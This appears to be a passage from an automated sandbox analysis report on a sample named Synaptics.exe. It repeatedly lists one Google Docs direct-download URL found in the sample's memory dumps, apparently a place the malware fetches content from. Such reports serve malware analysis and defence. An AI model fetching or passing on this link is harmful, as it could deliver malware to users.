Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.399185009.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.502983467.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.519427749.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.510071207.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428663745.000000000F047000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-
                              Source: Synaptics.exe, 00000002.00000000.404990941.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499334298.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-)
                              Source: Synaptics.exe, 00000002.00000000.408126624.0000000005878000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.500942768.0000000005878000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377610647.0000000005878000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-R
                              Source: Synaptics.exe, 00000002.00000000.386889262.000000000F0EC000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428758581.000000000F0EC000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.386622904.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508548531.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380432666.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404990941.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.420417448.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499334298.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.399185009.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.502983467.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.519427749.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428663745.000000000F047000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.
                              Source: Synaptics.exe, 00000002.00000000.404990941.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499334298.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.(
                              Source: Synaptics.exe, 00000002.00000000.386889262.000000000F0EC000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428758581.000000000F0EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download..
                              Source: Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.510071207.000000000F2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download...
                              Source: Synaptics.exe, 00000002.00000000.399185009.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.519427749.000000001DC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download..5
                              Source: Synaptics.exe, 00000002.00000000.386889262.000000000F0EC000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428758581.000000000F0EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download..hd
                              Source: Synaptics.exe, 00000002.00000000.408126624.0000000005878000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.500942768.0000000005878000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377610647.0000000005878000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.U
                              Source: Synaptics.exe, 00000002.00000000.380635776.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.421289465.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.509241899.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.503286393.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.500972620.0000000005894000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429136519.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377752563.00000000058A2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.500649438.0000000005824000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.407916229.0000000005824000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377175932.0000000005824000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.408309357.0000000005894000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.510071207.000000000F2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/
                              Source: Synaptics.exe, 00000002.00000002.499207022.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404990941.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/R
                              Source: Synaptics.exe, 00000002.00000000.386622904.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.385676487.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428474579.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508548531.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.421827465.0000000007C47000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508283526.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.503455143.0000000007C47000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428663745.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380825428.0000000007C46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0
                              Source: Synaptics.exe, 00000002.00000002.501301876.0000000005907000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377752563.00000000058A2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.409244131.0000000005907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0ei
                              Source: Synaptics.exe, 00000002.00000000.380635776.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.421289465.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.509241899.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.503286393.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429136519.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499159034.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380432666.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.420417448.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.399185009.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.502983467.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.519427749.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404802165.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.510071207.000000000F2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1
                              Source: Synaptics.exe, 00000002.00000000.421827465.0000000007C47000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.503455143.0000000007C47000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380825428.0000000007C46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1CK
                              Source: Synaptics.exe, 00000002.00000000.375758362.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.509241899.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.386622904.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429136519.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499159034.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508548531.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380432666.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404990941.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.420417448.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499334298.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.502983467.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404802165.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.510071207.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428663745.000000000F047000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2
                              Source: Synaptics.exe, 00000002.00000000.380635776.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.421289465.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.509241899.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.503286393.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.386622904.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.385676487.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428474579.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429136519.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508283526.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.510071207.000000000F2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3
                              Source: Synaptics.exe, 00000002.00000002.499207022.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404990941.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3Q
                              Source: Synaptics.exe, 00000002.00000000.375758362.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380635776.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.421289465.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.509241899.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.503286393.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.500972620.0000000005894000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429136519.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499159034.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377752563.00000000058A2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.421827465.0000000007C47000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.500649438.0000000005824000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.407916229.0000000005824000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377175932.0000000005824000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.408309357.0000000005894000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404802165.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.503455143.0000000007C47000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.510071207.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380825428.0000000007C46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4
                              Source: Synaptics.exe, 00000002.00000000.386889262.000000000F0EC000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428758581.000000000F0EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4g
                              Source: Synaptics.exe, 00000002.00000000.386622904.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508548531.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380432666.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.421827465.0000000007C47000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.420417448.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.502983467.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.503455143.0000000007C47000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428663745.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380825428.0000000007C46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5
                              Source: Synaptics.exe, 00000002.00000002.501301876.0000000005907000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377752563.00000000058A2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.409244131.0000000005907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5d
                              Source: Synaptics.exe, 00000002.00000002.509241899.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.385676487.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428474579.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429136519.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508283526.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404990941.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499334298.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6
                              Source: Synaptics.exe, 00000002.00000002.501301876.0000000005907000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377752563.00000000058A2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.409244131.0000000005907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6g
                              Source: Synaptics.exe, 00000002.00000000.380635776.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.421289465.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.509241899.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.503286393.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.386622904.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429136519.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508548531.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380432666.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.420417448.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.502983467.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.510071207.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428663745.000000000F047000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7
                              Source: Synaptics.exe, 00000002.00000002.500942768.0000000005878000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.502983467.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.503455143.0000000007C47000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.510071207.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377610647.0000000005878000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428663745.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380825428.0000000007C46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8
                              Source: Synaptics.exe, 00000002.00000000.404990941.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499334298.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8(
                              Source: Synaptics.exe, 00000002.00000000.377752563.00000000058A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8X
                              Source: Synaptics.exe, 00000002.00000002.500972620.0000000005894000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377752563.00000000058A2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.408309357.0000000005894000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8c
                              Source: Synaptics.exe, 00000002.00000002.500972620.0000000005894000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377752563.00000000058A2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.408309357.0000000005894000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8f
                              Source: Synaptics.exe, 00000002.00000000.380635776.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.421289465.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.509241899.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.503286393.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.500972620.0000000005894000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429136519.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377752563.00000000058A2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.500649438.0000000005824000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.407916229.0000000005824000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377175932.0000000005824000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.408309357.0000000005894000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.510071207.000000000F2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9
                              Source: Synaptics.exe, 00000002.00000000.375758362.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380635776.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.421289465.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.509241899.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.503286393.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429136519.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499159034.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380432666.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404990941.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.420417448.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499334298.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.502983467.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404802165.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.510071207.000000000F2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:
                              Source: Synaptics.exe, 00000002.00000002.509241899.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.500972620.0000000005894000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.385676487.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428474579.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429136519.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377752563.00000000058A2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508283526.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.408309357.0000000005894000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;
                              Source: Synaptics.exe, 00000002.00000002.499207022.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404990941.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;R
